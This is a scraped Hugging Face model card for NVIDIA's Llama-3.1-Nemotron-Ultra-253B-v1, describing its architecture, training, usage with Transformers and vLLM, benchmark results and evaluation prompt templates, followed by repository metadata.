Llama-3.1-Nemotron-Ultra-253B-v1 is a model which offers a great tradeoff between model accuracy and efficiency. Efficiency (throughput) directly translates to savings. Using a novel Neural Architecture Search (NAS) approach, we greatly reduce the model’s memory footprint, enabling larger workloads, as well as reducing the number of GPUs required to run the model in a data center environment. This NAS approach enables the selection of a desired point in the accuracy-efficiency tradeoff. Furthermore, by using a novel method to vertically compress the model (see details [here](https://arxiv.org/abs/2503.18908)), it also offers a significant improvement in latency.
|
| 27 |
+
|
| 28 |
+
The model underwent a multi-phase post-training process to enhance both its reasoning and non-reasoning capabilities. This includes a supervised fine-tuning stage for Math, Code, Reasoning, Chat, and Tool Calling as well as multiple reinforcement learning (RL) stages using Group Relative Policy Optimization (GRPO) algorithms for reasoning, chat, and instruction-following.
|
| 29 |
+
|
| 30 |
+
This model is ready for commercial use.
|
| 31 |
+
|
| 32 |
+
For more details on how the model was trained, please see [this blog](https://developer.nvidia.com/blog/build-enterprise-ai-agents-with-advanced-open-nvidia-llama-nemotron-reasoning-models/).
|
| 33 |
+
|
| 34 |
+

|
| 35 |
+
|
| 36 |
+
This model is part of the Llama Nemotron Collection. You can find the other model(s) in this family here:
|
| 37 |
+
|
| 38 |
+
- [Llama-3.1-Nemotron-Nano-8B-v1](https://huggingface.co/nvidia/Llama-3.1-Nemotron-Nano-8B-v1)
|
| 39 |
+
- [Llama-3.3-Nemotron-Super-49B-v1](https://huggingface.co/nvidia/Llama-3_3-Nemotron-Super-49B-v1)
|
| 40 |
+
|
| 41 |
+
## License/Terms of Use
|
| 42 |
+
|
| 43 |
+
GOVERNING TERMS: Your use of this model is governed by the [NVIDIA Open Model License](https://www.nvidia.com/en-us/agreements/enterprise-software/nvidia-open-model-license/). Additional Information: [Llama 3.1 Community License Agreement](https://www.llama.com/llama3_1/license/). Built with Llama.
|
| 44 |
+
|
| 45 |
+
**Model Developer:** NVIDIA
|
| 46 |
+
|
| 47 |
+
**Model Dates:** Trained between November 2024 and April 2025
|
| 48 |
+
|
| 49 |
+
**Data Freshness:** The pretraining data has a cutoff of 2023 per Llama-3.1-405B-Instruct
|
| 50 |
+
|
| 51 |
+
### Use Case:
|
| 52 |
+
Developers designing AI Agent systems, chatbots, RAG systems, and other AI-powered applications. Also suitable for typical instruction-following tasks.
|
| 53 |
+
|
| 54 |
+
### Release Date:
|
| 55 |
+
2025-04-07
|
| 56 |
+
|
| 57 |
+
## References
|
| 58 |
+
|
| 59 |
+
* [\[2502.00203\] Reward-aware Preference Optimization: A Unified Mathematical Framework for Model Alignment](https://arxiv.org/abs/2502.00203)
|
| 60 |
+
* [\[2411.19146\] Puzzle: Distillation-Based NAS for Inference-Optimized LLMs](https://arxiv.org/abs/2411.19146)
|
| 61 |
+
* [\[2503.18908\] FFN Fusion: Rethinking Sequential Computation in Large Language Models](https://arxiv.org/abs/2503.18908)
|
| 62 |
+
|
| 63 |
+
## Model Architecture
|
| 64 |
+
**Architecture Type:** Dense decoder-only Transformer model
|
| 65 |
+
**Network Architecture:** Llama-3.1-405B-Instruct, customized through Neural Architecture Search (NAS)
|
| 66 |
+
|
| 67 |
+
**This model was developed based on Llama-3.1-405B-Instruct.** <br>
|
| 68 |
+
**This model has 253B model parameters.** <br>
|
| 69 |
+
|
| 70 |
+
The model is a derivative of Llama 3.1-405B-Instruct, using Neural Architecture Search (NAS). The NAS algorithm results in non-standard and non-repetitive blocks. This includes the following:
|
| 71 |
+
|
| 72 |
+
* Skip attention: In some blocks, the attention is skipped entirely, or replaced with a single linear layer.
|
| 73 |
+
* Variable FFN: The expansion/compression ratio in the FFN layer is different between blocks.
|
| 74 |
+
* FFN Fusion: When several consecutive attention layers are skipped, which can result in a sequence of multiple FFNs, that sequence of FFNs is fused into a smaller number of wider FFN layers.
|
| 75 |
+
|
| 76 |
+
For each block of the reference model, we create multiple variants providing different tradeoffs of quality vs. computational complexity, discussed in more depth below. We then search over the blocks to create a model which meets the required throughput and memory while minimizing the quality degradation. To recover performance, the model initially undergoes knowledge distillation (KD) for 65 billion tokens. This is followed by a continual pretraining (CPT) phase for 88 billion tokens.
|
| 77 |
+
|
| 78 |
+
## Intended use
|
| 79 |
+
|
| 80 |
+
Llama-3.1-Nemotron-Ultra-253B-v1 is a general purpose reasoning and chat model intended to be used in English and coding languages. Other non-English languages (German, French, Italian, Portuguese, Hindi, Spanish, and Thai) are also supported.
|
| 81 |
+
|
| 82 |
+
## Input
|
| 83 |
+
- **Input Type:** Text
|
| 84 |
+
- **Input Format:** String
|
| 85 |
+
- **Input Parameters:** One-Dimensional (1D)
|
| 86 |
+
- **Other Properties Related to Input:** Context length up to 131,072 tokens
|
| 87 |
+
|
| 88 |
+
## Output
|
| 89 |
+
- **Output Type:** Text
|
| 90 |
+
- **Output Format:** String
|
| 91 |
+
- **Output Parameters:** One-Dimensional (1D)
|
| 92 |
+
- **Other Properties Related to Output:** Context length up to 131,072 tokens
|
| 93 |
+
|
| 94 |
+
## Software Integration
|
| 95 |
+
- **Runtime Engine:** Transformers
|
| 96 |
+
- **Recommended Hardware Microarchitecture Compatibility:**
|
| 97 |
+
- NVIDIA Hopper
|
| 98 |
+
- NVIDIA Ampere
|
| 99 |
+
- **Preferred Operating System(s):** Linux
|
| 100 |
+
|
| 101 |
+
## Model Version
|
| 102 |
+
1.0 (4/7/2025)
|
| 103 |
+
|
| 104 |
+
## Quick Start and Usage Recommendations:
|
| 105 |
+
|
| 106 |
+
1. Reasoning mode (ON/OFF) is controlled via the system prompt, which must be set as shown in the example below. All instructions should be contained within the user prompt
|
| 107 |
+
2. We recommend setting temperature to `0.6`, and Top P to `0.95` for Reasoning ON mode
|
| 108 |
+
3. We recommend using greedy decoding (temperature 0) for Reasoning OFF mode
|
| 109 |
+
4. We do not recommend adding additional system prompts besides the control prompt; all instructions should be put into the user query
|
| 110 |
+
5. We have provided a list of prompts to use for evaluation for each benchmark where a specific template is required
|
| 111 |
+
|
| 112 |
+
You can try this model out through the preview API, using this link: [Llama-3_1-Nemotron-Ultra-253B-v1](https://build.nvidia.com/nvidia/llama-3_1-nemotron-ultra-253b-v1).
|
| 113 |
+
|
| 114 |
+
### Use It with Transformers
|
| 115 |
+
See the snippet below for usage with the [Hugging Face Transformers](https://huggingface.co/docs/transformers/main/en/index) library. Reasoning mode (ON/OFF) is controlled via the system prompt; please see the examples below.
|
| 116 |
+
|
| 117 |
+
We recommend using the *transformers* package with version 4.48.3.
|
| 118 |
+
Example of reasoning on:
|
| 119 |
+
|
| 120 |
+
```py
|
| 121 |
+
import torch
|
| 122 |
+
import transformers
|
| 123 |
+
|
| 124 |
+
model_id = ""nvidia/Llama-3_1-Nemotron-Ultra-253B-v1""
|
| 125 |
+
model_kwargs = {""torch_dtype"": torch.bfloat16, ""trust_remote_code"": True, ""device_map"": ""auto""}
|
| 126 |
+
tokenizer = transformers.AutoTokenizer.from_pretrained(model_id)
|
| 127 |
+
tokenizer.pad_token_id = tokenizer.eos_token_id
|
| 128 |
+
|
| 129 |
+
pipeline = transformers.pipeline(
|
| 130 |
+
""text-generation"",
|
| 131 |
+
model=model_id,
|
| 132 |
+
tokenizer=tokenizer,
|
| 133 |
+
max_new_tokens=32768,
|
| 134 |
+
temperature=0.6,
|
| 135 |
+
top_p=0.95,
|
| 136 |
+
**model_kwargs
|
| 137 |
+
)
|
| 138 |
+
|
| 139 |
+
thinking = ""on""
|
| 140 |
+
|
| 141 |
+
|
| 142 |
+
print(pipeline([{""role"": ""system"", ""content"": f""detailed thinking {thinking}""},{""role"": ""user"", ""content"": ""Solve x*(sin(x)+2)=0""}]))
|
| 143 |
+
```
|
| 144 |
+
|
| 145 |
+
Example of reasoning off:
|
| 146 |
+
|
| 147 |
+
```py
|
| 148 |
+
import torch
|
| 149 |
+
import transformers
|
| 150 |
+
|
| 151 |
+
model_id = ""nvidia/Llama-3_1-Nemotron-ULtra-253B-v1""
|
| 152 |
+
model_kwargs = {""torch_dtype"": torch.bfloat16, ""trust_remote_code"": True, ""device_map"": ""auto""}
|
| 153 |
+
tokenizer = transformers.AutoTokenizer.from_pretrained(model_id)
|
| 154 |
+
tokenizer.pad_token_id = tokenizer.eos_token_id
|
| 155 |
+
|
| 156 |
+
pipeline = transformers.pipeline(
|
| 157 |
+
""text-generation"",
|
| 158 |
+
model=model_id,
|
| 159 |
+
tokenizer=tokenizer,
|
| 160 |
+
max_new_tokens=32768,
|
| 161 |
+
do_sample=False,
|
| 162 |
+
**model_kwargs
|
| 163 |
+
)
|
| 164 |
+
|
| 165 |
+
thinking = ""off""
|
| 166 |
+
|
| 167 |
+
|
| 168 |
+
print(pipeline([{""role"": ""system"", ""content"": f""detailed thinking {thinking}""},{""role"": ""user"", ""content"": ""Solve x*(sin(x)+2)=0""}]))
|
| 169 |
+
```
|
| 170 |
+
|
| 171 |
+
### Use It with vLLM
|
| 172 |
+
|
| 173 |
+
```
|
| 174 |
+
pip install vllm==0.8.3
|
| 175 |
+
```
|
| 176 |
+
An example on how to serve with vLLM:
|
| 177 |
+
```
|
| 178 |
+
python3 -m vllm.entrypoints.openai.api_server \
|
| 179 |
+
--model ""nvidia/Llama-3_1-Nemotron-Ultra-253B-v1"" \
|
| 180 |
+
--trust-remote-code \
|
| 181 |
+
--seed=1 \
|
| 182 |
+
--host=""0.0.0.0"" \
|
| 183 |
+
--port=5000 \
|
| 184 |
+
--served-model-name ""nvidia/Llama-3_1-Nemotron-Ultra-253B-v1"" \
|
| 185 |
+
--tensor-parallel-size=8 \
|
| 186 |
+
--max-model-len=32768 \
|
| 187 |
+
--gpu-memory-utilization 0.95 \
|
| 188 |
+
--enforce-eager
|
| 189 |
+
```
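Once the server is running it exposes an OpenAI-compatible API, so it can be queried with the standard `openai` client. A minimal illustrative sketch; host, port, and model name are taken from the command above, and the `api_key` value is a placeholder (vLLM does not check it by default).

```py
# Illustrative sketch: query the vLLM server started above.
from openai import OpenAI

client = OpenAI(base_url="http://0.0.0.0:5000/v1", api_key="not-needed")
resp = client.chat.completions.create(
    model="nvidia/Llama-3_1-Nemotron-Ultra-253B-v1",
    messages=[
        {"role": "system", "content": "detailed thinking on"},
        {"role": "user", "content": "Solve x*(sin(x)+2)=0"},
    ],
    temperature=0.6,  # recommended settings for Reasoning ON
    top_p=0.95,
)
print(resp.choices[0].message.content)
```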
|
| 190 |
+
## Inference:
|
| 191 |
+
**Engine:**
|
| 192 |
+
|
| 193 |
+
- Transformers
|
| 194 |
+
|
| 195 |
+
**Test Hardware:**
|
| 196 |
+
- BF16:
|
| 197 |
+
- 8x NVIDIA H100-80GB
|
| 198 |
+
- 4x NVIDIA B100
|
| 199 |
+
- FP8:
|
| 200 |
+
- 4x NVIDIA H100-80GB
|
| 201 |
+
|
| 202 |
+
## Training and Evaluation Datasets
|
| 203 |
+
|
| 204 |
+
## Training Datasets
|
| 205 |
+
|
| 206 |
+
A large variety of training data was used for the knowledge distillation phase before the post-training pipeline, including three datasets: FineWeb, Buzz-V1.2, and Dolma.
|
| 207 |
+
|
| 208 |
+
The data for the multi-stage post-training phases is a compilation of SFT and RL data that supports improvements of math, code, general reasoning, and instruction following capabilities of the original Llama instruct model.
|
| 209 |
+
|
| 210 |
+
Prompts have been sourced from either public and open corpora or synthetically generated. Responses were synthetically generated by a variety of models, with some prompts containing responses for both reasoning-on and reasoning-off modes, to train the model to distinguish between the two modes. This model was improved with Qwen.
|
| 211 |
+
|
| 212 |
+
We have released our [Llama-Nemotron-Post-Training-Dataset](https://huggingface.co/datasets/nvidia/Llama-Nemotron-Post-Training-Dataset) to promote openness and transparency in model development and improvement.

**Data Collection for Training Datasets:**

- Hybrid: Automated, Human, Synthetic

**Data Labeling for Training Datasets:**

- Hybrid: Automated, Human, Synthetic

## Evaluation Datasets

We used the datasets listed in the next section to evaluate Llama-3.1-Nemotron-Ultra-253B-v1.

**Data Collection for Evaluation Datasets:**

- Hybrid: Human/Synthetic

**Data Labeling for Evaluation Datasets:**

- Hybrid: Human/Synthetic/Automatic

## Evaluation Results

*These results cover both Reasoning On and Reasoning Off modes. We recommend using temperature=\`0.6\`, top\_p=\`0.95\` for Reasoning On mode, and greedy decoding for Reasoning Off mode. All evaluations are done with a 32k sequence length. We run each benchmark up to 16 times and average the scores for accuracy.*

> NOTE: Where applicable, a Prompt Template will be provided. While completing benchmarks, please ensure that you are parsing for the correct output format as per the provided prompt in order to reproduce the benchmarks seen below.

### GPQA

| Reasoning Mode | pass@1 |
|--------------|------------|
| Reasoning Off | 56.60 |
| Reasoning On | 76.01 |

User Prompt Template:

```
""What is the correct answer to this question: {question}\nChoices:\nA. {option_A}\nB. {option_B}\nC. {option_C}\nD. {option_D}\nLet's think step by step, and put the final answer (should be a single letter A, B, C, or D) into a \boxed{}""
```
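
The note above asks for format-aware parsing. As an illustrative sketch (not the official evaluation harness), the boxed answer can be pulled from a completion with a regex:

```py
import re

def extract_boxed_answer(completion: str) -> str | None:
    # Return the contents of the last \boxed{...} in the model output.
    matches = re.findall(r""\\boxed\{([^}]*)\}"", completion)
    return matches[-1].strip() if matches else None

print(extract_boxed_answer(r""...so the final answer is \boxed{A}""))  # -> A
```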

### AIME25

| Reasoning Mode | pass@1 |
|--------------|------------|
| Reasoning Off | 16.67 |
| Reasoning On | 72.50 |

User Prompt Template:

```
""Below is a math question. I want you to reason through the steps and then give a final answer. Your final answer should be in \boxed{}.\nQuestion: {question}""
```

### BFCL V2 Live

| Reasoning Mode | Score |
|--------------|------------|
| Reasoning Off | 73.62 |
| Reasoning On | 74.10 |

User Prompt Template:

```
You are an expert in composing functions. You are given a question and a set of possible functions.
Based on the question, you will need to make one or more function/tool calls to achieve the purpose.
If none of the function can be used, point it out. If the given question lacks the parameters required by the function,
also point it out. You should only return the function call in tools call sections.

If you decide to invoke any of the function(s), you MUST put it in the format of <TOOLCALL>[func_name1(params_name1=params_value1, params_name2=params_value2...), func_name2(params)]</TOOLCALL>

You SHOULD NOT include any other text in the response.
Here is a list of functions in JSON format that you can invoke.

<AVAILABLE_TOOLS>{functions}</AVAILABLE_TOOLS>

{user_prompt}
```
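
For this benchmark the function calls must be recovered from the <TOOLCALL> wrapper that the template mandates. A hedged sketch of that extraction (again, illustrative rather than the official harness; the example call is hypothetical):

```py
import re

def extract_tool_calls(reply: str) -> str | None:
    # Pull the bracketed call list out of <TOOLCALL>[...]</TOOLCALL>.
    m = re.search(r""<TOOLCALL>(.*?)</TOOLCALL>"", reply, re.DOTALL)
    return m.group(1).strip() if m else None

print(extract_tool_calls(""<TOOLCALL>[get_weather(city='Paris')]</TOOLCALL>""))
```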

### LiveCodeBench (20240801-20250201)

| Reasoning Mode | pass@1 |
|--------------|------------|
| Reasoning Off | 29.03 |
| Reasoning On | 66.31 |

User Prompt Template (without starter code):

````
""You will be given a question (problem specification) and will generate a correct Python program that matches the specification and passes all tests.

Question: {prompt}

Read the inputs from stdin solve the problem and write the answer to stdout (do not directly test on the sample inputs). Enclose your code within delimiters as follows. Ensure that when the python program runs, it reads the inputs, runs the algorithm and writes output to STDOUT.
```python
# YOUR CODE HERE
```
````

User Prompt Template (with starter code):

````
You will be given a question (problem specification) and will generate a correct Python program that matches the specification and passes all tests.

Question: {prompt}

You will use the following starter code to write the solution to the problem and enclose your code within delimiters.
```python
{starter_code}
```
````
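
Likewise, for LiveCodeBench the generated program must be extracted from the Python code fences requested by both templates; a small illustrative sketch:

````py
import re

def extract_python_block(completion: str) -> str | None:
    # Return the body of the first ```python ... ``` block in the completion.
    m = re.search(r""```python\s*(.*?)```"", completion, re.DOTALL)
    return m.group(1) if m else None
````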

### IFEval

| Reasoning Mode | Strict:Instruction |
|--------------|------------|
| Reasoning Off | 88.85 |
| Reasoning On | 89.45 |

### MATH500

| Reasoning Mode | pass@1 |
|--------------|------------|
| Reasoning Off | 80.40 |
| Reasoning On | 97.00 |

User Prompt Template:

```
""Below is a math question. I want you to reason through the steps and then give a final answer. Your final answer should be in \boxed{}.\nQuestion: {question}""
```

### JudgeBench

| Reasoning Mode | Knowledge Score | Reasoning Score | Math Score | Coding Score | Overall Score |
|--------------|------------|------------|------------|------------|------------|
| Reasoning On | 70.13 | 81.63 | 89.29 | 92.86 | 79.14 |

## Ethical Considerations:

NVIDIA believes Trustworthy AI is a shared responsibility and we have established policies and practices to enable development for a wide array of AI applications. When downloaded or used in accordance with our terms of service, developers should work with their internal model team to ensure this model meets requirements for the relevant industry and use case and addresses unforeseen product misuse.

For more detailed information on ethical considerations for this model, please see the Model Card++ [Explainability](./EXPLAINABILITY.md), [Bias](./BIAS.md), [Safety & Security](./SAFETY_and_SECURITY.md), and [Privacy](./PRIVACY.md) Subcards.

Please report security vulnerabilities or NVIDIA AI Concerns [here](https://www.nvidia.com/en-us/support/submit-security-vulnerability/).","{""id"": ""nvidia/Llama-3_1-Nemotron-Ultra-253B-v1"", ""author"": ""nvidia"", ""sha"": ""fdb0e3ef93b51ddc9cd96a76e08a09e3f7f8ea3f"", ""last_modified"": ""2025-04-18 22:09:31+00:00"", ""created_at"": ""2025-04-07 18:47:10+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 20220, ""downloads_all_time"": null, ""likes"": 268, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": ""warm"", ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""nemotron-nas"", ""text-generation"", ""nvidia"", ""llama-3"", ""pytorch"", ""conversational"", ""custom_code"", ""en"", ""arxiv:2503.18908"", ""arxiv:2502.00203"", ""arxiv:2411.19146"", ""license:other"", ""autotrain_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- en\nlibrary_name: transformers\nlicense: other\nlicense_name: nvidia-open-model-license\nlicense_link: https://www.nvidia.com/en-us/agreements/enterprise-software/nvidia-open-model-license/\npipeline_tag: text-generation\ntags:\n- nvidia\n- llama-3\n- pytorch"", ""widget_data"": [{""text"": ""Hi, what can you help me with?""}, {""text"": ""What is 84 * 3 / 2?""}, {""text"": ""Tell me an interesting fact about the universe!""}, {""text"": ""Explain quantum computing in simple terms.""}], ""model_index"": null, ""config"": {""architectures"": [""DeciLMForCausalLM""], ""auto_map"": {""AutoConfig"": ""configuration_decilm.DeciLMConfig"", ""AutoModelForCausalLM"": ""modeling_decilm.DeciLMForCausalLM""}, ""model_type"": ""nemotron-nas"", ""tokenizer_config"": {""bos_token"": ""<|begin_of_text|>"", ""chat_template"": ""{{- bos_token }}{%- if messages[0]['role'] == 'system' %}{%- set system_message = messages[0]['content']|trim %}{%- set messages = messages[1:] %}{%- else %}{%- set system_message = \""detailed thinking on\"" %}{%- endif %}{{- \""<|start_header_id|>system<|end_header_id|>\\n\\n\"" }}{{- system_message }}{{- \""<|eot_id|>\"" }}{%- for message in messages %}{%- if message['role'] == 'assistant' and '</think>' in message['content'] %}{%- set content = message['content'].split('</think>')[-1].lstrip() %}{%- else %}{%- set content = message['content'] %}{%- endif %}{{- '<|start_header_id|>' + message['role'] + '<|end_header_id|>\\n\\n' + content | trim + '<|eot_id|>' }}{%- endfor %}{%- if add_generation_prompt %}{{- '<|start_header_id|>assistant<|end_header_id|>\\n\\n' }}{%- endif %}"", ""eos_token"": ""<|eot_id|>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": ""modeling_decilm.DeciLMForCausalLM"", ""pipeline_tag"": ""text-generation"", ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='BIAS.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='EXPLAINABILITY.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='PRIVACY.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='SAFETY_and_SECURITY.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='__init__.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='accuracy_plot.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='block_config.py', 
size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_decilm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00008-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00009-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00010-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00011-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00012-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00013-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00014-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00015-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00016-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00017-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00018-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00019-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00020-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00021-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00022-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00023-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00024-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00025-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00026-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00027-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00028-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00029-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00030-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00031-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00032-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00033-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00034-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='model-00035-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00036-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00037-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00038-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00039-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00040-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00041-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00042-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00043-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00044-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00045-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00046-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00047-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00048-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00049-of-00049.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_decilm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='nemo_common.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='nemo_common.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='nemo_model_config.yaml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_name.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_flowchart.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__activations.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__cache_utils.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__configuration_llama.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__modeling_attn_mask_utils.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__modeling_flash_attention_utils_backward_compat.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__modeling_outputs.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__modeling_rope_utils.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='transformers_4_44_2__pytorch_utils.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='variable_cache.py', size=None, blob_id=None, lfs=None)""], ""spaces"": [""reflex-ai/nvidia-Llama-3_1-Nemotron-Ultra-253B-v1-demo"", ""caduh/nvidia-Llama-3_1-Nemotron-Ultra-253B-v1"", ""JishnuSetia/IntelliCounsel2.0"", ""JishnuSetia/EssayEase2.0"", ""JishnuSetia/JD-Matcher2.0"", ""Camargorock/Nemotron-Ultra""], 
""safetensors"": {""parameters"": {""BF16"": 253401268224}, ""total"": 253401268224}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-04-18 22:09:31+00:00"", ""cardData"": ""language:\n- en\nlibrary_name: transformers\nlicense: other\nlicense_name: nvidia-open-model-license\nlicense_link: https://www.nvidia.com/en-us/agreements/enterprise-software/nvidia-open-model-license/\npipeline_tag: text-generation\ntags:\n- nvidia\n- llama-3\n- pytorch"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": ""modeling_decilm.DeciLMForCausalLM"", ""pipeline_tag"": ""text-generation"", ""processor"": null}, ""_id"": ""67f41dae290ea3246e6f9bcb"", ""modelId"": ""nvidia/Llama-3_1-Nemotron-Ultra-253B-v1"", ""usedStorage"": 506829656144}",0,"https://huggingface.co/Joumdane/Llama-3_1-Nemotron-Ultra-253B-v1, https://huggingface.co/limjh12/llama3.1_Test",2,,0,"https://huggingface.co/DevQuasar/nvidia.Llama-3_1-Nemotron-Ultra-253B-v1-GGUF, https://huggingface.co/nm-testing/Llama-3_1-Nemotron-Ultra-253B-v1-FP8-dynamic, https://huggingface.co/unsloth/Llama-3_1-Nemotron-Ultra-253B-v1-GGUF, https://huggingface.co/ArtusDev/nvidia_Llama-3_1-Nemotron-Ultra-253B-v1_EXL3_1.35bpw_H6, https://huggingface.co/Ithanil/Llama-3_1-Nemotron-Ultra-253B-v1-W8A8-Dynamic",5,,0,"Camargorock/Nemotron-Ultra, JishnuSetia/EssayEase2.0, JishnuSetia/IntelliCounsel2.0, JishnuSetia/JD-Matcher2.0, caduh/nvidia-Llama-3_1-Nemotron-Ultra-253B-v1, reflex-ai/nvidia-Llama-3_1-Nemotron-Ultra-253B-v1-demo",6
Joumdane/Llama-3_1-Nemotron-Ultra-253B-v1,"---
license: other
license_name: nvidia-open-model-license
license_link: >-
  https://www.nvidia.com/en-us/agreements/enterprise-software/nvidia-open-model-license/
base_model:
- nvidia/Llama-3_1-Nemotron-Ultra-253B-v1
tags:
- gguf-connector
---

